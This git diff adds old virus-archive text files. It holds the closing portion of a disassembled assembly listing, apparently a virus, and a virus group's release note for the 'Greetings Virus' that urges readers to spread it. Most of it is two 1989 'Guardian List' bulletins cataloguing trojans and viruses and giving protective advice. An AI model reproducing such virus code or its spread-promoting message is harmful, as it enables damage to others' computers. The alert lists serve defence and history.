+    JB   ;0998               ;09E8 72AE
+    MOV  Byte Ptr [0021],00  ;09EA C606210000
+    INC  Word Ptr [0026]          ;09EF FF062600
+    JMP  ;0998               ;09F3 EBA3
+    POP  BX             ;09F5 5B
+    RET                 ;09F6 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+    MOV  SI,01B3             ;09F7 BEB301
+    JMP  ;09FF               ;09FA EB03
+    MOV  SI,01C5             ;09FC BEC501
+    CALL L0A15               ;09FF E81300
+    MOV  SI,01D4             ;0A02 BED401
+    CALL L0A15               ;0A05 E80D00
+    MOV  AH,00               ;0A08 B400
+    INT  16             ;0A0A CD16
+    MOV  AH,01               ;0A0C B401
+    INT  16             ;0A0E CD16
+    JNZ  0A0C           ;0A10 75FA
+    JMP  ;08F8               ;0A12 E9E3FE
+                        ;
+L0A15:   LODSB                    ;L0A15
+    OR   AL,AL               ;0A16 0AC0
+    JZ   0A23           ;0A18 7409
+    MOV  AH,0E               ;0A1A B40E
+    MOV  BX,0007             ;0A1C BB0700
+    INT  10             ;0A1F CD10
+    JMP  L0A15               ;0A21 EBF2
+    RET                 ;0A23 C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+
+    MOV  CL,01               ;0A24 B101
+    CALL ;0971               ;0A26 E848FF
+    PUSH SI             ;0A29 56
+    MOV  DI,BX               ;0A2A 8BFB
+    MOV  AX,ES:[BX+1C]       ;0A2C 268B471C
+    XOR  DX,DX               ;0A30 33D2
+    DIV  Word Ptr [SI]       ;0A32 F734
+    INC  AL             ;0A34 FEC0
+    MOV  [002A],AL      ;0A36 A22A00
+    MOV  SI,019D             ;0A39 BE9D01
+    MOV  CX,000B             ;0A3C B90B00
+    REPZ                ;0A3F F3
+    CMPSB                    ;0A40 A6
+    JNZ  ;09F7               ;0A41 75B4
+    MOV  AX,ES:[BX+3A]       ;0A43 268B473A
+    MOV  [0022],AX      ;0A47 A32200
+    MOV  DI,BX               ;0A4A 8BFB
+    ADD  DI,+20              ;0A4C 83C720
+    MOV  SI,01A8             ;0A4F BEA801
+    MOV  CX,000B             ;0A52 B90B00
+    REPZ                ;0A55 F3
+    CMPSB                    ;0A56 A6
+    JNZ  ;09F7               ;0A57 759E
+    POP  SI             ;0A59 5E
+    RET                 ;0A5A C3
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CODE     ENDS                ;
+    END                 ;
+
\ No newline at end of file
diff --git a/textfiles.com/virus/greetng1.txt b/textfiles.com/virus/greetng1.txt
new file mode 100644
index 00000000..c4d94045
--- /dev/null
+++ b/textfiles.com/virus/greetng1.txt
@@ -0,0 +1,43 @@
+                   �����                              �������           ���
+����������      �����������        �             �����  ������      �����
+  ������      �����     ����      ���          ����      ������    ����
+    ������  �����         ��     ����         ���        �������  �����
+      ����������           �    ������        ��         ������� ������
+        �������            �   �������       ���         ���������������
+        ������                �� ������      ��         ����������������
+         �����              ���   �����      ���       ���� ������ ������
+         �����        ��������     �����      ���      ���   ����  �������
+         �����      ���  ����������������  ��         ���     ���   �������
+         �����         �����    ���������� ���       ����            ��������
+       ���������   �������         �������� ������������              ��������
+                 �������             �������� ���������                 ������
+                                       �������   ����
+                                         ��������
+
+�����������������������������������������������������������������������������ķ
+�               �/� A Youngsters Against McAfee Production �\�                �
+�����������������������������������������������������������������������������Ľ
+�����������������������������������������������������������������������������ķ
+� DISCLAIMER : By unzipping this file you hearby agree that YAM is not        �
+�   responsible for any damage that it does to your computer or anybody's     �
+�   else's computer.  We are also not responsible for what you or anyone else �
+�   does with the files included, be it running it on someone else's computer �
+�   or by running it on your own computer. (If your dumb enough too)          �
+�����������������������������������������������������������������������������Ľ
+�����������������������������������������������������������������������������ķ
+�                       �/�  Executable Information �\�                       �
+�����������������������������������������������������������������������������Ķ
+� Virus / Trojan Name      :  The Greetings Virus                             �
+� Author / Modification By :  Admiral Bailey                                  �
+� Language Used            :  Assembly Language [TASM 2.0]                    �
+� Type of Virus / Trojan   :  Encrypted TSR com/exe infector.                 �
+� Date Of Release          :  1-2-93                                          �
+�����������������������������������������������������������������������������Ķ
+� Some Notes:                                                                 �
+�   This here is a TSR com/exe infector.  Between certain times it will       �
+� display a bouncing ball.  Both on graphics (which it will ruin) and in text.�
+� When you reboot during a certain time it shall display a certain messege.   �
+� Well just enjoy and spread this.  As of scan 99 its unscannable.  If you    �
+� have any comments you can reach me on the YAM WHQ.  The Full Moon.  [416]   �
+�����������������������������������������������������������������������������Ľ
+
diff --git a/textfiles.com/virus/guardian.bbs b/textfiles.com/virus/guardian.bbs
new file mode 100644
index 00000000..7f03fb8e
--- /dev/null
+++ b/textfiles.com/virus/guardian.bbs
@@ -0,0 +1,530 @@
+  ----------------------------------------------------------------
+  |                    THE GUARDIAN LIST                         |
+  |                                                              |
+  |         -- An Abbreviated Trojan Alert List                  |
+  |            to be used as a BULLETIN on BBS's                 |
+  ----------------------------------------------------------------
+  |                          Issue #01:        November  12, 1989|
+  | By Tom Sirianni,                                             |
+  | and Those Sysops of FidoNet & LCRNET       Revision Stage `C'|
+  ----------------------------------------------------------------
+
+NAME             CATEGORY  NOTES
+--------------   --------  ---------------------------------------
+
+3X3SHR           *TROJAN   Time Bomb type trojan wipes the [Hard]
+                           Drive clean. File size is 78,848.
+
+ANTI-PCB         *TROJAN   The story behind this trojan horse is
+                           sickening. Apparently one RBBS-PC
+                           sysop and one PC-BOARD sysop started
+                           feuding about which BBS system was 
+                           better, and in the end the PC-BOARD
+                           sysop wrote a trojan and uploaded it to
+                           the rbbs SysOp under ANTI-PCB.COM. Of
+                           course the RBBS-PC SysOp ran it, and
+                           that led to quite a few accusations and
+                           a big mess in general. Let's grow up!
+                           Every SysOp has the right to run the
+                           type of BBS they please, and the fact
+                           that a SysOp actually wrote a trojan
+                           ntended for another sysop simply
+                           blows my mind.
+
+ARC2ZIP.EXE         VIRUS  This Lehigh Virus strain that attacks
+                           the COMMAND.COM and is used in 
+                           converting ARCed files to ZIPed files.
+                           This file also copies itself into the
+                           ZIPed file while remaining a TSR within
+                           COMMAND.COM. Also it is always looking
+                           for COMMAND.COM on a FLOPPY diskette, so
+                           it has two ways to infect.
+
+ARC513.EXE       *TROJAN   This hacked version of ARC appears
+                           normal, so beware!  It will write over
+                           track 0 of your [hard] disk upon usage,
+                           destroying the disk.
+
+ARC514.COM       *TROJAN   This is very similar to ARC version
+                           5.13 in that it will overwrite track 0
+                           (FAT Table) of your [Hard] disk. Also, I
+                           have yet to see an .EXE version of this
+                           program.
+
+ARC533.EXE         VIRUS   This is a new Virus program designed to
+                           emulate Sea's ARC program. It infects
+                           OMMAND.COM. Lehigh Virus Type.
+
+BACKTALK         *TROJAN   This program used to be a good PD
+                           utility, but someone changed it to be
+                           trojan. Now this program will write/
+                           destroy sectors on your [hard] disk
+                           drive. Use this with caution if you
+                           acquire it, because it's more than
+                           likely that you got a bad copy.
+
+B30012A.ARC      *TROJAN   Was supposed to be a Quick BBS utilty
+                           to handle 300 baud Users. But what it
+                           really does is delete many of the
+                           general directories used by a Quick
+                           BBS system.
+
+CDIR.COM         *TROJAN   This program is supposed to give you a
+                           color directory of files on your disk,
+                           but it in fact will scramble your disk's
+                           File Allocation Table (FAT).
+
+D-XREF60.COM      TROJAN   A Pascal Utility used for Cross-
+                           Referencing, written by the infamous
+                           Dorn Stickel. It eats the FAT and
+                           BOOT sector after a time period has
+                           been met and if the [Hard] Drive is more
+                           than half full.
+
+DANCERS.BAS      *TROJAN   This trojan shows some animated dancers
+                           in color, and then proceeds to wipe out
+                           your [hard] disk's FAT table.  There is
+                           another perfectly good copy of DANCERS.
+                           BAS on BBS's around the country; appar-
+                           ently the idiot trojan author altered a
+                           legitimate program to do the dirty work.
+
+DISKSCAN.EXE      TROJAN   This was a PC-MAGAZINE program to scan
+                           a [hard] disk for bad sectors, but then
+                           a joker edited it to WRITE bad sectors 
+                           Also look for this under other names
+                           such as SCANBAD.EXE and BADDISK.EXE. A
+                           good original copy is availble on SCP
+                           Business BBS.
+
+DMASTER          *TROJAN   This is yet another FAT scrambler.
+
+DOSKNOWS.EXE     *TROJAN   I'm still tracking this one down --
+                           apparently someone wrote a FAT killer
+                           and renamed it DOSKNOWS.EXE, so it
+                           would be confused with the real,
+                           harmless DOSKNOWS system-status
+                           utility.  All I know for sure is that
+                           the REAL DOSKNOWS.EXE is 5376 bytes
+                           long.  If you see something called
+                           DOSKNOWS that isn't close to that size,
+                           sound the alarm.
+
+DOS-HELP          TROJAN   This trojan, when made memory-resident,
+                           is supposed to display a DOS command
+                           that the User needs help with. Works fine
+                           on a Diskette system, but on a [Hard]
+                           DRIVE system, it tries to format the
+                           [Hard] Disk with every access of
+                           DOS-HELP.
+
+DPROTECT         *TROJAN   Apparently someone tampered with the
+                           original, legitimate version of
+                           DPROTECT and turned it into a FAT
+                           eater. A good version is available
+                           on SCP Business BBS.
+
+DRAIN2           *TROJAN   There really is a DRAIN program, but
+                           this revised program goes out does a Low
+                           Level Format while it is playing the 
+                           funny program.
+
+DROID.EXE        *TROJAN   This trojan appears under the guise of
+                           a game. You are supposedly an architect
+                           who controls futuristic droids in search
+                           of relics. In fact, PC-Board sysops (if
+                           they run this program from C:\PCBOARD) 
+                           will find that it copies C:\PCBOARD\
+                           PCBOARD.DAT to C:\PCBOARD\HELP\HLPX. The 
+                           .EXE file is 54,272 bytes.
+
+DRPTR.ARC         TROJAN   File found on two boards in the 343
+                           Net.  After running unsuspected file,
+                           the only things left in the Sysop's
+                           root directory were the subdirectories
+                           and two of the three DOS System files,
+                           along with a 0-byte file named
+                           WIPEOUT.YUK. The Sysop's COMMAND.COM
+                           was located in a different directory;
+                           the file date and CRC had not changed.
+
+DSZ (Patch)     *CAREFUL   The author of this protocol program,
+                           Chuck Forsberg, warns that anyone using
+                           an Unregistered version of DSZ that was
+                           HACKED with a downloaded PATCH to make
+                           it work fully, might get a SCRAMBLED FAT.
+                           Seems someone created the HACK PATCH and
+                           then uploaded it to BBS's. *BEWARE* of
+                           the PATCH! It is not the DSZ program that
+                           does the dirty work, but the invalid PATCH.
+
+EGABTR           *TROJAN   BEWARE! Description says something like
+                           "improve your EGA display," but when
+                           run, it deletes everything in sight and
+                           prints, "Arf! Arf! Got you!"
+
+EMMCACHE        *CAREFUL   This program is not exactly a trojan,
+                           but it (v. 1.0) may have the capability
+                           of destroying [Hard] disks by:
+                           A) Scrambling every file modified after
+                           running the program.
+                           B) Destroying boot sectors.
+                           This program has damaged at least two
+                           [Hard] disks; yet there is a base of
+                           happily registered users. Therefore, 
+                           extreme caution is advised if you decide
+                           to use this program.
+
+FILER.EXE        *TROJAN   One SysOp complained a while ago that
+                           this program wiped out his 20 Megabyte
+                           [Hard] disk. I'm not so sure that he was
+                           correct and/or telling the truth any
+                           more. I have personally tested an
+                           excellent file manager also named
+                           FILER.EXE, and it worked perfectly. 
+                           Also, many other SysOp's have written
+                           to tell me that they have like me used
+                           a FILER.EXE with no problems. If you
+                           get a program named FILER.EXE, it is
+                           probably alright, but better to test it
+                           first using some security measures.
+
+FILES.GBS        CAREFUL   When an OPUS BBS system is installed
+                           improperly, this file could spell
+                           disaster for the Sysop.  It can let a
+                           user of any level into the system.
+                           Protect yourself. Best to have a
+                           sub-directory in each upload area
+                           called c:\upload\files.gbs (this is an
+                           example only). This would force Opus to
+                           rename a file upload of files.gbs and
+                           prevent its usage.
+
+FINANCE4.ARC    *CAREFUL   This program is not a verified trojan;
+                           there is simply a file going around
+                           BBS's warning that it may be a trojan. 
+                           In any case, exercise extreme care with
+                           it.
+
+FLU4TXT.COM       TROJAN   Man, when I thought we had it licked!
+                           This Trojan was inserted into the
+                           FluShot4.ARC and uploaded to many
+                           BBS's. FluShot is a protector of your
+                           COMMAND.COM. The author of FluShot
+                           posted this Trojan warning, and I am
+                           posting it here in the GL. If you need
+                           a good copy, you can get it from here--
+                           SCP Business BBS--or on COMPUSERVE.
+
+FOX2.ARC          TROJAN   The show program was put into the FOX
+(SHOW.COM)                 archive to display a porono on VGA.
+                           While doing so it corrupts the FAT of
+                           the HD. Even NU can not recover it. A
+                           FAT recover program like MIRROR has
+                           not yet been tested for it.
+                           Name     Size  Date
+                           Show.com 14562 06/02/85
+
+FUTURE.BAS       *TROJAN   This "program" starts out with a very
+                           nice color picture (of what, I don't
+                           know) and then proceeds to tell you
+                           that you should be using your computer
+                           for better things than games and
+                           graphics. After making that point, it
+                           trashes your A: drive, and B:, C:, D: 
+                           drives until it has erased all drives.
+                           It does not go after the FAT alone; it
+                           also erases all of your data. As far
+                           as I know, however, it erases only one
+                           sub-directory tree level deep, thus
+                           [Hard] disk users should only be
+                           seriously affected if they are in the
+                           "root" directory. I'm not sure about
+                           this one either, though.
+
+GATEWAY2         *TROJAN   Someone tampered with version 2.0 of
+                           the CTTY monitor GATEWAY.  What it
+                           does is ruin the FAT. If you need a
+                           good copy, you can file-request it or
+                           pick one up from 105/301--SCP Business
+                           BBS.
+
+GRABBER           TROJAN   This program is supposed to be a SCREEN
+                           CAPTURE program that copies the screen
+                           to a .COM to be run later from the DOS
+                           command line. As a TSR, it will also
+                           attempt to do a DISK WRITE to the [Hard]
+                           drive when you do not want it to. It
+                           will wipe whole Directories when doing
+                           a normal DOS command. One sysop who
+                           ran it lost all of his ROOT directory
+                           including his SYSTEM files. The file
+                           status is :
+                           Name         Size  Date      Time
+                           GRABBER.COM  2583  05/28/87  22:10
+
+GRASPRT.EXE        VIRUS   This file was in a porno file called
+                           SEXSHOE.LZH originating from PC-EXEC 
+                           BBS. The Sysop took it off, but it had
+                           been downloaded by a few people. This is
+                           one of the Jerusalem-B Virus strains.
+                           The status is:
+                           Name         Size   Date      Time
+                           GRASPRT.EXE  73376  06/03/86  09:49
+
+G-MAN             TROJAN   Another FAT killer.
+
+HEART.EXE         VIRUS    Infected with the Israeli Virus.
+                           Displays the HEART logo on CGA monitor
+                           while infecting the HD. File is found
+                           on some SHAREWARE houses watch for it.
+                           Name      Size  Date
+                           HEART.EXE 13744 ?????
+
+JIV40.LZH         VIRUS    Hacked propgram of JIV - current real
+                           program is v3.3 NOT v4.0 - It is also
+                           infected by a Virus which attaches to
+                           any .COM file it can find.
+
+KC-PAL.COM        TROJAN   Infects the COMMAND.COM and then attaches
+                           to any .COM file afterward using the
+                           COMMAND.COM during its use of Internal
+                           commands (COPY, DIR, TYPE, etc.). The
+                           COMMAND.COM files are enlarged in size
+                           by 1538 bytes, and in the Time column
+                           of the directory, listing the seconds
+                           is reset from :00 to :62.
+
+LM                TROJAN   Deletes the COMMAND.COM and other
+                           files from the ROOT directory of the 
+                           [Hard] Drive when the program runs.
+
+MAP               TROJAN   This is another trojan horse written by
+                           the infamous Dorn Stickel. Designed
+                           to display what TSR's are in memory and
+                           works on FAT and BOOT sectors. Also
+                           seems towork only when the [Hard] Drive
+                           is 50 percent full or more.
+
+MATHKIDS.ARC     *TROJAN   This is a fairly benign trojan that
+                           will not reformat your [Hard] disks or
+                           do any system-level damage. Instead,
+                           it is designed to crack a BBS system. It
+                           will attempt to copy the USER file on
+                           a BBS to a file innocently called
+                           FIXIT.ARC, which the originator can
+                           later call in and download. Believed
+                           to be designed for PCBoard BBS's.
+
+MOUSEKEY.COM      VIRUS    Mouse device program infected with the
+                           CASCADE type virus.
+
+NORTSHOT.ZIP      TROJAN   A supposed VIRUS checker - while
+NORTSTOP.ZIP               listing the DIR during its check
+                           displays that the disk is Virus Free -
+                           but during Dec. 24th and Dec. 31st it
+                           will ERASE files in several DIR's
+                           based on their extension. NORTSHOT.ZIP
+                           and NORTSTOP.ZIP are same file.
+                           Name         Size  Date
+                           NORTSTOP.EXE 38907 ?????
+
+NOTROJ.COM       *TROJAN   This "program" is the most sophisti-
+                           cated trojan horse that I've seen to
+                           date. All outward appearances indicate
+                           that the program is a useful utility
+                           used to FIGHT other trojan horses.
+                           Actually, it is a time bomb that erases
+                           any [Hard] disk FAT IT can find and,
+                           at the same time, it warns: "another 
+                           program is attempting a format, can't
+                           abort!  After erasing the FAT(s),
+                           NOTROJ then proceeds to start a low
+                           level format. One extra thing to note:
+                           NOTROJ only damages FULL [Hard] drives;
+                           if a [Hard] disk is under 50 percent 
+                           full, this program won't touch it!
+                           If you are interested in reading a
+                           thorough report on NOTROJ.COM, James H.
+                           Coombes has written an excellent text
+                           file on the matter named NOTROJ.TXT.
+                           If you have trouble finding it, you
+                           can get it from SCP Business BBS.
+
+PACKDIR          *TROJAN   This utility is supposed to "pack"
+                           (sort and optimize) the files on a
+                           [hard] disk, but apparently it
+                           scrambles FATs.
+
+PCW271xx.ARC     *TROJAN   A modified version of the popular
+                           PC-WRITE word processor (v. 2.71) has
+                           now scrambled at least 10 FAT tables
+                           that I know of.  If you want to
+                           download version 2.71 of PC-WRITE, be 
+                           very careful!  The bogus version can be
+                           identified by its size; it uses 98,274
+                           bytes whereas the good version uses
+                           98,644.  For reference, version 2.7 of
+                           PC-WRITE occupies 98,242 bytes.
+
+PKX35B35.ARC }   *TROJAN   This was supposed to be an update to
+PKB35B35.ARC }    *VIRUS   PKARC file compress utility. When it is
+                           run, it *EATS your FATS* and is said to 
+                           to infect other files so it can spread.
+                           Possible VIRUS.
+
+PKPAK/PKUNPAK   *CAREFUL   There is a TAMPERED version of 3.61
+  v3.61                    that interferes with PC's interrupts.
+
+PKFIX361.EXE     *TROJAN   Supposed patch to v3.61. What it really
+                           does when it is extracted from the .EXE 
+                           file is do DIRECT access to the DRIVE
+                           CONTROLLER to perform a Low-Level format,
+                           thereby bypassing checking programs.
+
+PK362.EXE       *CAREFUL   This is a NON-RELEASED version and is
+                           suspected as being a *TROJAN*. Not
+                           verified.
+
+PK363.EXE       *CAREFUL   This is a NON-RELEASED version and is
+                           suspected as being a *TROJAN*. Not
+                           verified.
+
+PKZ100.EXE        TROJAN   Supposed to be a new release of PKZIP,
+                           but what it really does is fill up
+                           your [Hard] drive with many directories
+                           until the system no longer functions. 
+                           The current version is PKZIP v.092.
+
+PKZ120.EXE        TROJAN   Modeifies the AREAS.BBS of BBS's that
+                           use such a file. Replaces addreses in
+                           that file with dummy addreses. then
+                           deletest itself to avoid any way to
+                           desipher how it works.
+                           Name       Size           Date
+                           PKZ120.EXE 172,000approx. 09/13/89
+
+QUIKRBBS.COM     *TROJAN   This Trojan horse advertises that it
+                           will install a program to protect your
+                           RBBS but it does not. It goes and eats
+                           away at the FAT instead.
+
+QUIKREF          *TROJAN   This ARChive contains ARC513.COM.
+                           It is supposed to load RBBS-PC's message
+                           file into memory two times faster than
+                           normal. What it really does is copy the
+                           RBBS-PC.DEF into an ASCII file named
+                           HISCORES.DAT.
+
+RCKVIDEO         *TROJAN   This is another trojan that does what
+                           it's supposed to do, and then wipes out
+                           [Hard] disks.  After showing some simple
+                           animation of a rock star ("Madonna," I
+                           think), the program will go to work on
+                           erasing every file it can lay it's
+                           hands on. After about a minute of this,
+                           it will create three ASCII files that 
+                           say, "You are stupid to download a
+                           video about rock stars," or something
+                           of the like.
+
+SECRET.BAS       *TROJAN   BEWARE!! This may be posted with a note
+                           saying it doesn't seem to work, and
+                           would someone please try it; when you
+                           do, it formats your disks. 
+
+SIDEWAYS.COM     *TROJAN   Be careful with this trojan; there is a
+                           perfectly legitimate version of
+                           SIDEWAYS.EXE circulating. Both the
+                           trojan and the good SIDEWAYS advertise 
+                           that they can print sideways, but
+                           SIDEWAYS.COM will trash a [hard] disk's
+                           boot sector instead. The trojan .COM
+                           file is about 3 KB, whereas the
+                           legitimate .EXE file is about 30 KB
+                           large.
+
+STAR.EXE         *TROJAN   Beware RBBS-PC SysOps! This file puts
+                           some stars on the screen while copying
+                           RBBS-PC.DEF to another name that can be
+                           downloaded later!
+
+STRIPES.EXE      *TROJAN   Similar to STAR.EXE, this one draws an
+                           American flag (nice touch), while it's
+                           busy copying your RBBS-PC.DEF to
+                           another file (STRIPES.BQS) so the joker
+                           can log in later, download STRIPES.BQS, 
+                           and steal all your passwords. Nice, huh?
+
+SUG.COM           TROJAN   This one is supposed to go out and
+                           unprotect copy protected programs disks
+                           by Softguard Systems, Inc.  After it
+                           trashes your disk, it comes back and
+                           displays:
+                           "This destruction constitutes a prima
+                           facie evidence of your violation. If
+                           you attempt to challenge Softguard
+                           Systems Inc..., you will be vigorously
+                           counter-sued for copyright infringement
+                           and theft of services."
+                           AND it by-passes any attempt by CHK4BOMB 
+                           to search for the any hidden messages
+                           that tell you, "YOU BEEN HAD... or 
+                           GOTCHA>>> Ar..Ar..Ar...  It encrypts the
+                           Gotcha message so no Trojan checker can
+                           scan for it.
+
+TIRED            *TROJAN   Another scramble-the-FAT trojan by Dorn
+                           W. Stickel.
+
+TOPDOS           *TROJAN   This is a simple high level [hard] disk
+                           formatter.
+
+TSRMAP           *TROJAN   This program does what it's supposed to
+                           do:  give a map outlining the location
+                           (in RAM) of all TSR programs, but it
+                           also erases the boot sector of drive
+                           "C:".
+
+ULTIMATE.EXE      TROJAN   Another FAT eater.  File status:
+                           Name           Size
+                           ULTIMATE.EXE   3090
+                           ULTIMATE.ARC   2432
+
+UNIX               VIRUS   The UNIX operating system by Berkley,
+                           verson 4.3, is an INTERNET virus. A
+                           Patch is available on SCP Business
+                           BBS. This is the MAIL PACKET VIRUS.
+
+VDIR.COM         *TROJAN   This is a disk killer that Jerry
+                           Pournelle wrote about in BYTE Magazine. 
+                           I have never seen it, although a
+                           responsible friend of mine has.
+
+VGA2CGA.ARC        VIRUS   CGA converter - infected with the
+                           AIDS/Hahaha - has been found on many
+                           USA West Coast BBS's.
+
+VU.EXE            *VIRUS  Infected with the 1704-B Virus. Has not
+                          been confirmed. And is unkown what the
+                          file is supposed to do.
+
+WOW               *VIRUS   Also known as the 1701 Virus. This
+                           is a new strain of the Lehigh Virus
+                           as it not only looks for COMMAND.COM,
+                           but any .COM file. As it does it, the
+                           infected file is enlarged 1,701 bytes
+                           in SIZE. The infection takes as you
+                           run the .COM.  WOW is a TSR. What happens
+                           when you run WOW is that it displays an
+                           advertisement:
+                          	 ""The Wizards of Warez"
+                          	   in assocoation with
+                          	      the copycats
+                          	  the Pirates Unlimited
+                          	          OUTRUN
+                          	 WOW                     1989 "
+                           The virus is also known as WOWTITLE.
+
+
+                  << END OF ABBREVIATED LIST>>
diff --git a/textfiles.com/virus/guardian.vir b/textfiles.com/virus/guardian.vir
new file mode 100644
index 00000000..d4e7a3e1
--- /dev/null
+++ b/textfiles.com/virus/guardian.vir
@@ -0,0 +1,1032 @@
+  ----------------------------------------------------------------
+  |                       THE GUARDIAN LIST                      |
+  |                                                              |
+  |       -- An Uploaded Trojan/Virus Program Alert List.        |
+  |          This list is distributed thru FidoNet and           |
+  |          LCRNET.                                             |
+  ----------------------------------------------------------------
+  |                                 Issue #1:      Sept 25, 1989 |
+  |                                                              |
+  |                                 Revision Stage 'B'           |
+  |                                                              |
+  |Compiled by Sysops of FidoNet and LCRNET and other sources    |
+  |Edited by Tom Sirianni of FidoNet 105/301                     |
+  ----------------------------------------------------------------
+
+Introductory Note:
+
+This Trojan Alert List is dedicated to the efforts of the End User
+and the Sysop who have had very little support. Now, through The
+Guardian List, those Users/Sysops stand a chance in the fight
+against  worms, trojans, and viruses, reporting the results to you,
+the User. It is because of the efforts of many Sysops who have
+spent countless hours to have a BBS online and because of the End
+Users who love PD and ShareWare programs that this list is
+presented and aggressively maintained.
+
+Although there are other lists available, the Guardian is the only
+list that is constantly maintained and distributed through
+FidoNet's SDS network, assuring its distribution internationally in
+a matter of days. Much of what goes into The Guardian List comes
+from the DIRTY_DOZEN echo conference. Within this conference are
+Sysops and Users from around the world who help in the
+determination of what are and are not trojans/virii. There are also
+groups in Colleges abd Universities around the country
+participating in the List's development and maintenance.
+
+What's in the future? As the SDNet/Works! (The Shareware
+Distribution  Network) takes affect, you will see fewer attacks on
+Sysops as files are distributed through a controlled source, direct
+from the Authors. Until this concept is fully mobilized, The
+Guardian List will be here to help you, the Usesr and the Sysops,
+including those Sysops not in FidoNet or LCRNET.
+
+                                   Tom Sirianni
+                                   SCP Business BBS
+                                   FidoNet 105/301
+                                   LCRNET 1010/0
+
+SCP Business BBS, nor its Sysop or Editor, assumes any
+responsibility  for the validity or completeness of this list. Many
+sources contribute to the list, and it is very possible that one of
+the reported files works perfectly and is in the Public Domain.
+
+But all the same, it is quite possible that a mistake will slip in
+somewhere. Since this is the case, please keep in mind while
+reading  this list that, however unlikely, it is possible that I am
+(or my sources  are) incorrect in any accusation.
+
+
+Note: ** Some TROJANS are designed to work only on [Hard] Drives **
+
+
+HELP FROM USERS REQUESTED:
+
+Users upload bad software to hundreds of boards every day, and
+often times, the software is not yet in this list, or the file may
+have been corrupted due to a bad ARCHIVE.  However, if you run a
+trojan horse program that is not listed here, please don't send it
+to SCP Business BBS.  Instead, give me a call (SCP Business BBS
+phone 1-503-648-6687 9600-v42/2400/1200/300 baud supported) and
+leave me a message about the program (with a complete filename and
+any other information you may have) so that I can get the
+destructive program in the next issue. It is important to verify
+that the program is a TROJAN and not an OPERATOR error.  If anyone
+is unsure whether or not a file is a Trojan, and it's not listed in
+the GL, I recommend using a utility like BOMBSQAD.COM or
+CHK4BOMB.EXE to prevent any mishaps. For VIRUSES, use VirusScan or
+FlusShot+. After your call, I may want you to upload it just to
+verify it myself if you are unable to.
+
+
+A WORD FROM TOM SIRIANNI:  TYPE OF TROJAN -- THE VIRUS...
+
+A Virus is a trojan which attaches itself to certain files and at
+predetermined time attacks your FAT, DIR, and/or BOOT areas, CROSS-
+LINKing files and looking for ways to attach itself to diskettes and 
+other disks containing files such as IBMDOS, IBMBIO, COMMAND.COM, 
+etc.  This type of virus spreads its dirty work to other systems much 
+like the flu or a cold, relying on the user to spread the VIRUS.  
+Protection (to a limited degree) from these virus strains is avail-
+able with ShareWare programs SENTRY, SCAN (VirusScan), and FSP
+(FluShot Plus), which are all available on the SCP Business BBS,
+105/301 FidoNet, 1-503-648-6687 (PC-Pursuit ORPOR), or through SDS
+nodes within FidoNet (note that SDS and SDN are two separate
+enities).
+
+The best program, called SCAN, better know as VirusScan, can check
+any  physical or logical drive or diskette for any file infected by
+a Virus. It will tell what type of Virus and where it is located.
+
+
+WHAT TO DO IF YOU THINK YOU ARE INFECTED WITH A TROJAN/VIRUS
+
+There are three ways to tell if you are infected:
+
+1)   First, have a GOOD DOS diskette with COMMAND.COM on it, PLUS
+put a WRITE-PROTECT TAB on your DOS disk.  Then, from your system,
+do a DIR on the good DOS diskette.  If you get a WRITE-ERROR, you
+are infected -- DIR does not do any writing of any kind, whereas
+the VIRUS does.
+
+2)   Another way is to check and compare the time-date stamp of
+COMMAND.COM.  The Virus writes to the COMMAND.COM thereby changing
+the time-date stamp.
+
+3)   Use SCAN to tell if you are infected and it will tell you
+what type.
+
+     
+The psychologically unbalanced individuals writing and uploading
+these programs will change their viral methods, so beware.  Many
+new viral detection programs are in the works, both commercially
+and in the public domain, to keep up with the viral programs we
+have available, to confirmed SYSOPS, Virus/Trojan information
+texts on SCP Business BBS. The Virus text files are ZIPed and can
+be File-Requested thru FidoNet BBS's as VIRUS-1.ARC & VIRUS-2.ARC.
+
+
+Simple precautions:
+
+The thing to do is to check the contents of your downloads via the 
+verbose command of the type of archiving program used, making sure 
+ANSI.SYS is disbaled first.  DO NOT DOWNLOAD any files without any 
+available or known documentation unless you are assured it is safe
+by  the SYSOP.  Also, do not accept any ARCHIVE or diskette
+containing a file named COMMAND.COM. Use VirusScan!!!
+ 
+Remember -- these new TROJANS are no laughing matter.  Without
+causing  mass hysteria, use your best judgment, and check your
+procedures first!
+
+Final note:  There is a commercial program called C-4 by
+InterPath Corp. which will (to date) detect and contain ALL known
+PC-VIRUSES. So for the ultimate 100 percent protection, get C-4.
+
+                       C-4 by InterPath Corp.
+                       4423 Cheeney St.
+                       Santa Clara, Calif.
+                                       95054
+                       1-408-988-3832
+                                 was $40.00
+
+                       ----------------------
+
+
+A word on TROJANS -
+
+In the course of time trojans/viruses have gained MEDIA attention.
+Unfortunately, RUMORS have always played a major factor in its
+notoriety. The truth is, of all those reported are minimal compared
+to the vast amounts of programs out there in the BBS community.
+Some are designed to defame people or companies.  As an example,
+Dorn Stickel has been noted to be a supposed Author of several
+TROJANS. But in real life, he is not that person. So, until
+verified, do not think it is real and, at the same time, do not
+ignore the existence either. Be cautious with all types of file
+transfers and all types of media used.
+
+
+ANSI TEXT FILES/DOC FILES:
+
+Did you know a TROJAN can be used in DOC and TEXT files?  If your
+system is configured for ANSI.SYS in your CONFIG.SYS file, your
+keyboard could be redirected or the keys reconfigured.
+
+For example, you could hit the F1 key and the trojan could do a
+High Level Format; or hit ALT-X and it will say "del *.* and yes".
+It can answer to the prompts and before you say, "What the
+'(&^(~*%' is going on?", your system is deleted. And it can also
+hide those commands.
+
+USE A BROWSER OR LISTER PROGRAM WHEN LOOKING AT ANY TEXT/DOC FILE;
+even an editor or PC Tools Edit or word process will work. This
+way, no redirection can take place.
+
+
+ANSI IN ARC FILES:
+
+It has been noted that it is possible to put ANSI redirection codes
+within several types of ARCers used to archive files in the BBS
+community. To be safe, do not do a VERBOSE listing of an ARC unless
+you make sure ANSI.SYS is disabled in your system's CONFIG.SYS.
+Also, there are several utilites available through SDS nodes in
+FidoNet such as STRIPZIP which will take those ANSI codes out of
+the ARCed file. Current versions of LHARC, PAK, and PKZIP now
+default to ANSI display turned OFF, so this helps.
+
+Final Note:
+
+Before we go into the listing as of the current date of this issue, 
+it seems that the Jerusalem Virus is the most natorious or the 
+most promient. When infected, the way to get rid of the Virus is to
+run VirusScan to determine which file it is then delete that and 
+replace it with known GOOD file.
+
+------------------------------------------------------------------
+
+
